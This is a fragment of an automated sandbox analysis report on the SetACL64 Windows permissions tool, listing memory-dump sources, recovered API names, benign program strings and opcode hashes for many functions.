                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$Lockitstd::_$Lockit::_Lockit::~_SetgloballocaleValidstd::locale::_
                                        • String ID: > was not found in domain <$Account <$ProcessACEsOfGivenDomains
                                        • API String ID: 2555488030-3371799133
                                        • Opcode ID: 466707cee54b4337e627ad1c5b082164c4624fdca99e4cbe8ccd6642e64db4c1
                                        • Instruction ID: e1cb55081dc4947951d65f08fd0d95871ad5d825abb67cf4411cb3b0837f2558
                                        • Opcode Fuzzy Hash: 466707cee54b4337e627ad1c5b082164c4624fdca99e4cbe8ccd6642e64db4c1
                                        • Instruction Fuzzy Hash: BD0281A2A18B81C5EF008F64D4883AD6761FF947A8F50523ADB5D47AE9DF7DE980C310
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ObjectSingleWait$EventMutexReleaseReset
                                        • String ID:
                                        • API String ID: 4195719913-0
                                        • Opcode ID: 53c02e3128979e1348d48c8753feaf8a9deea66a6de0b7d4b8ab2bd848f986ba
                                        • Instruction ID: 6ffc553d7a659dbefa639c0182d432df865ea05768376e4391a8cd2db22c07c5
                                        • Opcode Fuzzy Hash: 53c02e3128979e1348d48c8753feaf8a9deea66a6de0b7d4b8ab2bd848f986ba
                                        • Instruction Fuzzy Hash: 3BB17FB2A18BC1C5EB208F25D9583ED2361FF48798F414639DA6C8B7E5DF399980C310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                        • String ID: AddACE$Audit ACEs cannot be set on shares.$Invalid access mode for this ACL type specified (e.g. you cannot add audit ACEs to the DACL, only to the SACL).$Invalid inheritance specified.$No trustee specified.
                                        • API String ID: 3936042273-1410195417
                                        • Opcode ID: c4ff67e74c09a2f73a2b1b69ce317e7775f2c5bfd494f419ddfd883c6a867768
                                        • Instruction ID: 16501448b9b3021dd10c85ff3757a854934383daba2a0cd23c8e8e2dd7fd0fea
                                        • Opcode Fuzzy Hash: c4ff67e74c09a2f73a2b1b69ce317e7775f2c5bfd494f419ddfd883c6a867768
                                        • Instruction Fuzzy Hash: EE226BB2A18782C5EB10CF68D4447AE7365FF44798F804139DA4C97AA9DFBDE984C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                        • API String ID: 2565136772-3242537097
                                        • Opcode ID: a89e39b1e6dab9013fa2c69796a28cd76b0915c44a41f147d36bdeccd3bdc5f6
                                        • Instruction ID: 935ec8524d3155687c59c2ab6d708839f6295308129ccb8b25f55b9599b215ee
                                        • Opcode Fuzzy Hash: a89e39b1e6dab9013fa2c69796a28cd76b0915c44a41f147d36bdeccd3bdc5f6
                                        • Instruction Fuzzy Hash: 352165A0E19A07C5FE65DB24E86A5742361BF84744F54007DCA0ED66B5EF2EEC45C330
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn
                                        • String ID: > is probably incorrect.$AddDomain$Domain name <
                                        • API String ID: 3668304517-3402377043
                                        • Opcode ID: 331517c9e7e271e5a7fd40b88897b6cbc41d5860be722eeb7a384d55d81c47f0
                                        • Instruction ID: 9ac1a748f5bf3dc28994894a0f16ffe34b2475cc45b218d3e1e7c429256f3d28
                                        • Opcode Fuzzy Hash: 331517c9e7e271e5a7fd40b88897b6cbc41d5860be722eeb7a384d55d81c47f0
                                        • Instruction Fuzzy Hash: F1D160A2B19742C5EE10DB68D4593AD2326FF447A4F405239DB5C87AEADFBDE980C310
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$ConvertFreeLocalString
                                        • String ID:
                                        • API String ID: 347880976-0
                                        • Opcode ID: 7f36a04dbe1e1195e17bb9c4e0bc062f01be79f362d0442487ffcee1471e9626
                                        • Instruction ID: 96b6cde6fdc25a6b124a10be198633369c54c61a5a8bf31a48a2b6150b1bfb5e
                                        • Opcode Fuzzy Hash: 7f36a04dbe1e1195e17bb9c4e0bc062f01be79f362d0442487ffcee1471e9626
                                        • Instruction Fuzzy Hash: 522291A2A18B81C5FB008B68E4443AD6771FF443A8F505239DF9D97AE9DF79E884C310
                                        APIs
                                        • IsValidAcl.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,00000000,00000000,00007FF686859A60), ref: 00007FF68685A0E7
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Valid
                                        • String ID:
                                        • API String ID: 1304828667-0
                                        • Opcode ID: 562027f6ea632b8d146ccf656e1ba2dcc13df42484284c78869221e205c5226f
                                        • Instruction ID: ceb39bd6ad25b62fab73e098ed9e87cf16fcedaadcf656aed2cdc79b2027c3dc
                                        • Opcode Fuzzy Hash: 562027f6ea632b8d146ccf656e1ba2dcc13df42484284c78869221e205c5226f
                                        • Instruction Fuzzy Hash: 50518EA6A18646C6EB508B22E45963A73A5FFC8F85F044039DE4F87764DF3EE805C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn
                                        • String ID: AddDomain$No domain specified.
                                        • API String ID: 3668304517-2536513783
                                        • Opcode ID: 99e0925a6b9fdd9a5b0408bba0820a297a0d0a02d1bb6155b4d59c8334b4e1bd
                                        • Instruction ID: 08d9cbe70bd113d8848302526ec335d98aff1a810ea4e7ffdce8c9dc2bc1cc99
                                        • Opcode Fuzzy Hash: 99e0925a6b9fdd9a5b0408bba0820a297a0d0a02d1bb6155b4d59c8334b4e1bd
                                        • Instruction Fuzzy Hash: 9751B7F2A69782D2EA109B28E4593AD6321FF44794F804539D74C879EADFBDE980C710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$QueryValue$DefaultLangUser
                                        • String ID: \StringFileInfo\%04X04B0\%s$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
                                        • API String ID: 124864902-1470331934
                                        • Opcode ID: 84a91a20877e75cd1db0540d89d5f8e58374f05ff5f461cff2050a2cec5ccb81
                                        • Instruction ID: bf872a5d809861bb79f671558f92984363356e7f55ea6e9ae099d84a0bae0fb6
                                        • Opcode Fuzzy Hash: 84a91a20877e75cd1db0540d89d5f8e58374f05ff5f461cff2050a2cec5ccb81
                                        • Instruction Fuzzy Hash: D491A0B2A18B41C1EB00CF58E4442AE7761FF897A4F501239EA9D87BA9DF7DE584C710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$GetctypeLocinfo::_Locinfo_ctor
                                        • String ID: bad locale name
                                        • API String ID: 249287498-1405518554
                                        • Opcode ID: 8bc982661b0ee05dfb2898125f394b4b40cc44dd271d2c8eedadb7c000856f72
                                        • Instruction ID: 0362ff50ef98fb21abde8038824d2edfecb0dcd294d6f109a18a45e4b1812ec6
                                        • Opcode Fuzzy Hash: 8bc982661b0ee05dfb2898125f394b4b40cc44dd271d2c8eedadb7c000856f72
                                        • Instruction Fuzzy Hash: 7F718DA2B19A81C9FB15DF65D9502BC3364FF54744F080039DF8DA3A96DE3AE952C324
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7a5f5edd017b658e983cfd53b7e8145c4734415c703908048787467d75527855
                                        • Instruction ID: 37cde0b8ee0a8e9ebdae20085242ca243395c0f755390ccc7e8776fdc38bdca3
                                        • Opcode Fuzzy Hash: 7a5f5edd017b658e983cfd53b7e8145c4734415c703908048787467d75527855
                                        • Instruction Fuzzy Hash: D5B16DB2A15B81C9EB14CF64E8487AD33A5FF48B88F504029EF4D47A59DF39D890C354
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorLast$Valid$DeleteEqualInformation
                                        • String ID:
                                        • API String ID: 439278688-0
                                        • Opcode ID: 02abaca1715827c988373279d1206fa39163a6e830349d42f3409750fdde2c61
                                        • Instruction ID: 344a6eff489a6a41200e9fdbeae6a458f7b893de6cad95c91f516e73a36f76fd
                                        • Opcode Fuzzy Hash: 02abaca1715827c988373279d1206fa39163a6e830349d42f3409750fdde2c61
                                        • Instruction Fuzzy Hash: CE816BA1A0C6C6CAEE618B26954937967A1FF84B84F080439DA4ED7791DF3EEC50C720
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Valid$Equal$CopyLength
                                        • String ID:
                                        • API String ID: 1685539899-0
                                        • Opcode ID: 3b1f6e0476a15e4dbeff593321d0a39690655f45c3396d74e8fe94f401111051
                                        • Instruction ID: a4dd4278073af2a013df23084189b77d362f12a0b95b607b2d94aac1d75636ae
                                        • Opcode Fuzzy Hash: 3b1f6e0476a15e4dbeff593321d0a39690655f45c3396d74e8fe94f401111051
                                        • Instruction Fuzzy Hash: F6614BA2A0968AC5EF559B62955873963E1FF84BC4F094039DD4FC7694DF2AEC41C320
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$Lockitstd::_$Lockit::_Lockit::~_Setgloballocalestd::locale::_
                                        • String ID: \\?\$\\?\UNC\
                                        • API String ID: 3857612545-3019864461
                                        • Opcode ID: 80f86e82870b07e6d5627ecd3545ff3dece0f910a388d86736f9a77694643264
                                        • Instruction ID: ec64b29624004c076bbc19b5d94b6a7e40fa9581379ff9746ff67b21c99c93ac
                                        • Opcode Fuzzy Hash: 80f86e82870b07e6d5627ecd3545ff3dece0f910a388d86736f9a77694643264
                                        • Instruction Fuzzy Hash: 7A12BDE2B14A52C0EF158B65E6483AD2362BF44B98F404139CE1D977D8DF7EE844C361
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn
                                        • String ID: AddTrustee$No trustee specified.
                                        • API String ID: 3668304517-2850116058
                                        • Opcode ID: fb94bdf829771a45d73d4169ee65a2f39625c9cf73fdf6b67dd04f57a629b6a1
                                        • Instruction ID: 0172597cc770834c206db564e413adbbf54036ed6a53a0ed8c9f64ea8fd70147
                                        • Opcode Fuzzy Hash: fb94bdf829771a45d73d4169ee65a2f39625c9cf73fdf6b67dd04f57a629b6a1
                                        • Instruction Fuzzy Hash: DDE181B2B19782C1EF148B68D4883AD6366FF44784F505139D78C87AA9DFBEE890C710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                        • String ID: false$true
                                        • API String ID: 164343898-2658103896
                                        • Opcode ID: f445c541dcabc8c76a2eb441bad9b69acf557a9bd182a87f89098410cebb741f
                                        • Instruction ID: ae97e9e7d1953d2bce26382807daa9675c03813459d1763757b9afafb3f1c7ac
                                        • Opcode Fuzzy Hash: f445c541dcabc8c76a2eb441bad9b69acf557a9bd182a87f89098410cebb741f
                                        • Instruction Fuzzy Hash: 56D17862B19A42CAEB10DFA1D5442AD33A5FF48788F054139DF4CA7B89EF3AD916C314
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Valid$Equal$Length
                                        • String ID: unordered_map/set too long
                                        • API String ID: 2183326427-306623848
                                        • Opcode ID: ad27f92fef91cd753ab91c311a8dad5f0718926ff1c6d6db717cf738553d2b84
                                        • Instruction ID: 01e13e3b29bab320d22077e11ca26de59146cf1b724f28dfb404a23af3215cd2
                                        • Opcode Fuzzy Hash: ad27f92fef91cd753ab91c311a8dad5f0718926ff1c6d6db717cf738553d2b84
                                        • Instruction Fuzzy Hash: 29A1E362A29B45C1EE608F12E6483796365FF88B84F184639DF8D97751DF3EE8A0C314
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$LoadString
                                        • String ID: Operating system error message: $SetACL error message: $SetACL finished with error(s):
                                        • API String ID: 498717675-3876775778
                                        • Opcode ID: 5ce873107c147e58fbec8a04b54c5fd4bfe3e96f955e4566f1b3ca94a313b483
                                        • Instruction ID: cacafaff8aef16aef4453ca37b0079115f82df94c3156b3a4bae7fc55b23598f
                                        • Opcode Fuzzy Hash: 5ce873107c147e58fbec8a04b54c5fd4bfe3e96f955e4566f1b3ca94a313b483
                                        • Instruction Fuzzy Hash: 0E81B9A2A59BC6C5EB209F34D8443ED2361FF45788F809139D74C9B656DF6EDA84C310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_Locinfo_ctor
                                        • String ID: bad locale name
                                        • API String ID: 3718194943-1405518554
                                        • Opcode ID: 1a7bf999381c07af3242a3cc31933243c0f84e1edb9a9b3fcdc9fb87e6ad8860
                                        • Instruction ID: 5edb164053f14823ef009b0b5fbfb0295dba3cd7d5b04dfe628d906d343e664f
                                        • Opcode Fuzzy Hash: 1a7bf999381c07af3242a3cc31933243c0f84e1edb9a9b3fcdc9fb87e6ad8860
                                        • Instruction Fuzzy Hash: 27615CA2B1AA41C9EB15DF65D5402BC33B4FF84744F080039DB4D9BA55DE3AE951D324
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
